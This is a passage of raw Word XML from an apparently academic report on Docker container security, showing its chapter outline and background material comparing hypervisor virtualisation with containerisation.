      <w:r w:rsidR="00987185">
        <w:t xml:space="preserve"> to achieve the aims and objectives set</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B43C9" w14:textId="09451648" w:rsidR="00987185" w:rsidRDefault="00987185" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter five details the process of designing and implementing the aimed security attacks on Docker environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A74872C" w14:textId="4D921F2F" w:rsidR="00987185" w:rsidRDefault="00987185" w:rsidP="00093277">
      <w:r>
        <w:t xml:space="preserve">Chapter six </w:t>
      </w:r>
      <w:r w:rsidR="00FE08D8">
        <w:t>provides the testing and experimenting process of each designed attack on Docker containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C33E8A" w14:textId="1C88B87C" w:rsidR="00FE08D8" w:rsidRDefault="00FE08D8" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter seven examines</w:t>
      </w:r>
      <w:r w:rsidR="009C70A5">
        <w:t xml:space="preserve"> and analyses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the results obtained from each </w:t>
      </w:r>
      <w:r w:rsidR="009C70A5">
        <w:t>attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A2EAF" w14:textId="74E7A45B" w:rsidR="009C70A5" w:rsidRDefault="009C70A5" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter eight provides the overall summary of the report along with recommendations for further research on the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75992187" w14:textId="6F71BCB3" w:rsidR="009C70A5" w:rsidRDefault="009C70A5" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter nine details the experiences and lesson learnt</w:t>
      </w:r>
      <w:r w:rsidR="000D6CBB">
        <w:t xml:space="preserve"> by the author</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> throughout the course of th</w:t>
      </w:r>
      <w:r w:rsidR="000D6CBB">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79612286" w14:textId="1B98AD69" w:rsidR="000D6CBB" w:rsidRDefault="000D6CBB" w:rsidP="00093277">
      <w:r>
        <w:t>Chapter ten provides all the academic and journal references used to complete and write this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024AC8C" w14:textId="77777777" w:rsidR="00FE08D8" w:rsidRPr="00093277" w:rsidRDefault="00FE08D8" w:rsidP="00093277"/>
    <w:p w14:paraId="1DF365A9" w14:textId="77777777" w:rsidR="00093277" w:rsidRPr="00093277" w:rsidRDefault="00093277" w:rsidP="00093277"/>
    <w:p w14:paraId="5A9FFFB0" w14:textId="77777777" w:rsidR="002C211E" w:rsidRPr="002C211E" w:rsidRDefault="002C211E" w:rsidP="002C211E"/>
    <w:p w14:paraId="38B5AF9F" w14:textId="77777777" w:rsidR="00331B7C" w:rsidRPr="00331B7C" w:rsidRDefault="00331B7C" w:rsidP="00331B7C"/>
    <w:p w14:paraId="05907D37" w14:textId="77777777" w:rsidR="006C2B5A" w:rsidRPr="006C2B5A" w:rsidRDefault="006C2B5A" w:rsidP="006C2B5A"/>
    <w:p w14:paraId="63014F3C" w14:textId="0CB76BF9" w:rsidR="0013724F" w:rsidRDefault="0013724F" w:rsidP="0013724F"/>
    <w:p w14:paraId="73B5F4B0" w14:textId="77777777" w:rsidR="00710FDE" w:rsidRPr="0013724F" w:rsidRDefault="00710FDE" w:rsidP="0013724F"/>
    <w:p w14:paraId="12F1619E" w14:textId="1BBE6122" w:rsidR="00696A58" w:rsidRDefault="00C961D3" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc87032886"/>
      <w:r>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="006850BF">
        <w:t xml:space="preserve">BACKGROUND </w:t>
      </w:r>
      <w:r>
        <w:t>RESEARCH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689C68B" w14:textId="3D3B716C" w:rsidR="00696A58" w:rsidRDefault="0099358C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="714"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc87032887"/>
      <w:r>
        <w:t>OVERVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="3A30D928" w14:textId="5F57A9DC" w:rsidR="00696A58" w:rsidRPr="00D234EA" w:rsidRDefault="00696A58" w:rsidP="00696A58">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>In recent years, containerisation has become a new trend in the IT industry, particularly within the cloud ecosystem and DevOps. It simplifies creating and deploying applications and is thus loved by DevOps engineers and cloud practitioners. However, its security platform has not been tested profoundly. This section will briefly introduce the concepts that are required to develop and understand the aim of this research paper, along with reviewing of research papers in the area that are related to this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F079BD5" w14:textId="77777777" w:rsidR="00696A58" w:rsidRPr="001357AE" w:rsidRDefault="00696A58" w:rsidP="00696A58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc266710277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc266711030"/>
      <w:bookmarkStart w:id="10" w:name="_Toc271283211"/>
      <w:bookmarkStart w:id="11" w:name="_Toc340606375"/>
      <w:bookmarkStart w:id="12" w:name="_Toc340611902"/>
      <w:bookmarkStart w:id="13" w:name="_Toc340612072"/>
      <w:bookmarkStart w:id="14" w:name="_Toc340613999"/>
      <w:bookmarkStart w:id="15" w:name="_Toc341173665"/>
      <w:bookmarkStart w:id="16" w:name="_Toc341173843"/>
      <w:bookmarkStart w:id="17" w:name="_Toc341174523"/>
      <w:bookmarkStart w:id="18" w:name="_Toc345410421"/>
      <w:bookmarkStart w:id="19" w:name="_Toc345410752"/>
      <w:bookmarkStart w:id="20" w:name="_Toc345412857"/>
      <w:bookmarkStart w:id="21" w:name="_Toc371251349"/>
      <w:bookmarkStart w:id="22" w:name="_Toc371251398"/>
      <w:bookmarkStart w:id="23" w:name="_Toc371255378"/>
      <w:bookmarkStart w:id="24" w:name="_Toc371255533"/>
      <w:bookmarkStart w:id="25" w:name="_Toc86858507"/>
      <w:bookmarkStart w:id="26" w:name="_Toc86859248"/>
      <w:bookmarkStart w:id="27" w:name="_Toc86867412"/>
      <w:bookmarkStart w:id="28" w:name="_Toc87031919"/>
      <w:bookmarkStart w:id="29" w:name="_Toc87032888"/>
      <w:bookmarkStart w:id="30" w:name="_Toc202288068"/>
      <w:bookmarkStart w:id="31" w:name="_Toc266447541"/>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61F24572" w14:textId="2E26C919" w:rsidR="00696A58" w:rsidRDefault="0099358C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc87032889"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:t>VIRTUALISATION VS CONTAINERISATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="72F79C13" w14:textId="74EAFF0F" w:rsidR="00696A58" w:rsidRDefault="00696A58" w:rsidP="00696A58">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Virtualisation is the key factor behind the existence and success of cloud computing technology. It is a technology that combines both hardware and software techniques to create virtual machines (VM) and allows multiple instances of OS to run on a single physical </w:t>
      </w:r>
      <w:r w:rsidR="00A318F0">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>machine and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also be applied to create virtual instances of specific hardware components, such as storage, network, application, and memory.</w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Therefore, v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">irtualisation is used to capitalise and improve hardware resources to create cost-effective, scalable, efficient, flexible, and resilient IT services in clouding. Usually, virtualisation can </w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>be hypervisor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>-based or container-based. The hypervisor-based runs at the hardware level to create virtual machines, whereas container-based virtualisation occurs at the operating system level of the host machine</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:eastAsia="x-none"/>
          </w:rPr>
          <w:id w:val="-504522440"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION RKu15 \l 2057  \m SMo19</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:t>[2, 3]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47425B6A" w14:textId="0FDED81C" w:rsidR="006605FC" w:rsidRDefault="006605FC" w:rsidP="00696A58">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>In general, hypervisor virtualisation or known as Hyper-V</w:t>
      </w:r>
      <w:r w:rsidR="00C37129">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006A4F80">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>can be of type 1 or type 2.</w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> A type 1</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or bare-metal</w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> hypervisor create</w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>virtual machine</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>s (VM)</w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA69C1">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">that run directly </w:t>
      </w:r>
      <w:r w:rsidR="00784A5A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>on the host’s hardware</w:t>
      </w:r>
      <w:r w:rsidR="00CA69C1">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>entirely</w:t>
      </w:r>
      <w:r w:rsidR="00CA69C1">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> separated </w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">from the underlying operating system and are therefore </w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>highly</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> secure.</w:t>
      </w:r>
      <w:r w:rsidR="00A66DB7">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Furthermore, they provide better performance and efficiency than type 2 hypervisors</w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A66DB7">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00CF3A6A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> thus</w:t>
      </w:r>
      <w:r w:rsidR="00CF3A6A">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> more commonly used for big data center </w:t>
      </w:r>
      <w:r w:rsidR="00DA10B4">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>warehouses and enterprises.</w:t>
      </w:r>
      <w:r w:rsidR="00871A93">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> On the other hand, type 2 or hosted hypervisor technology creates </w:t>
      </w:r>
      <w:r w:rsidR="00A66DB7">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>VMs on the existing OS of the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00DA10B4">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">, see fig.1. </w:t>
      </w:r>
      <w:r w:rsidR="00FB6A32">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00DA10B4">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ith hosted hypervisor</w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DA10B4">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> different types of OS can be installed on the top of the </w:t>
      </w:r>
      <w:r w:rsidR="00FB6A32">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>host’s OS, sharing the host’s hardware resources</w:t>
      </w:r>
      <w:r w:rsidR="004D3D11">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can be installed on </w:t>
      </w:r>
      <w:r w:rsidR="008F001C">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>standard</w:t>
      </w:r>
      <w:r w:rsidR="001C368B">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> desktop computers and laptops and are mainly used for experimenting and testing software’s</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:eastAsia="x-none"/>
          </w:rPr>
          <w:id w:val="-173341265"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00650722">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00650722">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Đor21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="001C368B">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> \m SRP17</w:instrText>
          </w:r>
          <w:r w:rsidR="00650722">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:t>[4, 5]</w:t>
          </w:r>
          <w:r w:rsidR="00650722">
            <w:rPr>
              <w:lang w:eastAsia="x-none"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FB6A32">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004D3D11">
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> The following screenshot depicts the architecture of hypervisor virtualisation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79C772" w14:textId="34CE22D5" w:rsidR="00650722" w:rsidRDefault="00650722" w:rsidP="00650722">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3612E285" wp14:editId="0516EE9C">
            <wp:extent cx="4494938" cy="2870200"/>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0259" cy="2879983"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0E7BE" w14:textId="29CA081C" w:rsidR="00AA2D03" w:rsidRDefault="004D3D11" w:rsidP="004D3D11">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc86858592"/>
      <w:bookmarkStart w:id="34" w:name="_Toc86867482"/>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: type 1 and type 2 hypervisors</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-673643399"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00BA3876">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00BA3876">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Đor21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00BA3876">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidRPr="00BA3876">
            <w:rPr>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="004D3D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="3486520A" w14:textId="2A80A312" w:rsidR="001C368B" w:rsidRDefault="001C368B" w:rsidP="001C368B">
      <w:r>
        <w:t xml:space="preserve">On the contrary, </w:t>
      </w:r>
      <w:r w:rsidR="004C1021">
        <w:t>containerisation</w:t>
      </w:r>
      <w:r w:rsidR="00A5255A">
        <w:t xml:space="preserve"> is a still new technology that enables to create VMs at the OS level of the host’s machine</w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5255A">
        <w:t xml:space="preserve">where each VM runs </w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t>wholly</w:t>
      </w:r>
      <w:r w:rsidR="00A5255A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E369C7">
        <w:t>isolated,</w:t>
      </w:r>
      <w:r w:rsidR="00C37129">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A5255A">
        <w:t>and all share the host’s kernel OS.</w:t>
      </w:r>
      <w:r w:rsidR="00DC1EB4">
        <w:t xml:space="preserve"> It is mainly used to deploy multiple applications utilising the same OS on a single host or server.</w:t>
      </w:r>
      <w:r w:rsidR="00532D06">
        <w:t xml:space="preserve"> It keeps each application in its own </w:t>
      </w:r>
      <w:r w:rsidR="00BD7FB0">
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00B56F6F">
        <w:t xml:space="preserve"> or space, providing complete isolation and </w:t>
      </w:r>
      <w:r w:rsidR="00A348C3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00407285">
        <w:t xml:space="preserve">virtual </w:t>
      </w:r>
      <w:r w:rsidR="00B56F6F">
        <w:t>environment to each container</w:t>
      </w:r>
      <w:r w:rsidR="007237F3">
        <w:t>. They also share and access the host’s kernel directly.</w:t>
      </w:r>
      <w:r w:rsidR="00621DC9">
        <w:t xml:space="preserve"> Containers are built </w:t>
      </w:r>
      <w:r w:rsidR="0049295A">
        <w:t xml:space="preserve">using lightweight </w:t>
      </w:r>
      <w:r w:rsidR="00ED5DDB">
        <w:t xml:space="preserve">Linux-based </w:t>
      </w:r>
      <w:r w:rsidR="0049295A">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00950ECC">
        <w:t xml:space="preserve"> containing application</w:t>
      </w:r>
      <w:r w:rsidR="00ED5DDB">
        <w:t xml:space="preserve"> libraries, binaries,</w:t>
      </w:r>
      <w:r w:rsidR="00856743">
        <w:t xml:space="preserve"> dependencies</w:t>
      </w:r>
      <w:r w:rsidR="00F677FA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00452B3D">
